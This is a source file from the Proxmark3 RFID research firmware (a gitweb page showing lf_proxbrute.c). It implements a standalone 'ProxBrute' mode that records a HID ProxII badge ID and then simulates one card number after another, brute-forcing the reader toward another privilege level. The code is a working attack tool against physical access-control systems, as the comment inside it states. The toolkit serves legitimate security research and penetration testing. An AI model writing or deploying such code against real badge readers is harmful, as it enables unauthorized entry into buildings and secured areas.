search:
summary | log | graphiclog1 | graphiclog2 | commit | commitdiff | tree | refs | edit | fork
blame | history | raw | HEAD
reworked "lf em 4x50 chk" to use dynamic memory for dictionary
[RRG-proxmark3.git] / armsrc / Standalone / lf_proxbrute.c
blob67ef436ceeb7c04d2d5ae367cccee6c57c7a9132
1 //-----------------------------------------------------------------------------
2 // Samy Kamkar, 2011, 2012
3 // Brad antoniewicz 2011
4 // Christian Herrmann, 2017
5 //
6 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
7 // at your option, any later version. See the LICENSE.txt file for the text of
8 // the license.
9 //-----------------------------------------------------------------------------
10 // main code for LF aka Proxbrute by Brad antoniewicz
11 //-----------------------------------------------------------------------------
12 #include "standalone.h" // standalone definitions
13 #include "proxmark3_arm.h"
14 #include "appmain.h"
15 #include "fpgaloader.h"
16 #include "util.h"
17 #include "dbprint.h"
18 #include "ticks.h"
19 #include "lfops.h"
20
21 void ModInfo(void) {
22 DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
23 }
24
25 // samy's sniff and repeat routine for LF
26 void RunMod(void) {
27 StandAloneMode();
28 Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
29 FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
30
31 uint32_t high, low;
32
33 #define STATE_READ 0
34 #define STATE_BRUTE 1
35
36 uint8_t state = STATE_READ;
37
38 for (;;) {
39
40 WDT_HIT();
41
42 // exit from SamyRun, send a usbcommand.
43 if (data_available()) break;
44
45 // Was our button held down or pressed?
46 int button_pressed = BUTTON_HELD(280);
47 if (button_pressed != BUTTON_HOLD)
48 continue;
49
50 // Button was held for a second, begin recording
51 if (state == STATE_READ) {
52
53 LEDsoff();
54 LED_A_ON();
55 WAIT_BUTTON_RELEASED();
56
57 DbpString("[=] starting recording");
58
59 // findone, high, low
60 lf_hid_watch(1, &high, &low);
61
62 Dbprintf("[=] recorded | %x%08x", high, low);
63
64 // got nothing. blink and loop.
65 if (high == 0 && low == 0) {
66 SpinErr(LED_A, 100, 12);
67 DbpString("[=] only got zeros, retry recording after click");
68 continue;
69 }
70
71 SpinErr(LED_A, 250, 2);
72 state = STATE_BRUTE;
73 continue;
74
75 } else if (state == STATE_BRUTE) {
76
77 LED_C_ON(); // Simulate
78 WAIT_BUTTON_RELEASED();
79
80
81 /*
82 ProxBrute - brad a. - foundstone
83
84 Following code is a trivial brute forcer once you read a valid tag
85 the idea is you get a valid tag, then just try and brute force to
86 another priv level. The problem is that it has no idea if the code
87 worked or not, so its a crap shoot. One option is to time how long
88 it takes to get a valid ID then start from scratch every time.
89 */
90 DbpString("[=] entering ProxBrute mode");
91 Dbprintf("[=] simulating | %08x%08x", high, low);
92
93 for (uint16_t i = low - 1; i > 0; i--) {
94
95 if (data_available()) break;
96
97 // Was our button held down or pressed?
98 button_pressed = BUTTON_HELD(280);
99 if (button_pressed != BUTTON_HOLD) break;
100
101 Dbprintf("[=] trying Facility = %08x ID %08x", high, i);
102
103 // high, i, ledcontrol, timelimit 20000
104 CmdHIDsimTAGEx(0, high, i, 0, false, 20000);
105
106 SpinDelay(100);
107 }
108
109 state = STATE_READ;
110 SpinErr((LED_A | LED_C), 250, 2);
111 LEDsoff();
112 }
113 }
114
115 SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
116 DbpString("[=] You can take the shell back :) ...");
117 LEDsoff();
118 }
Proxmark3 - the RFID research Swiss army knife. Iceman firmware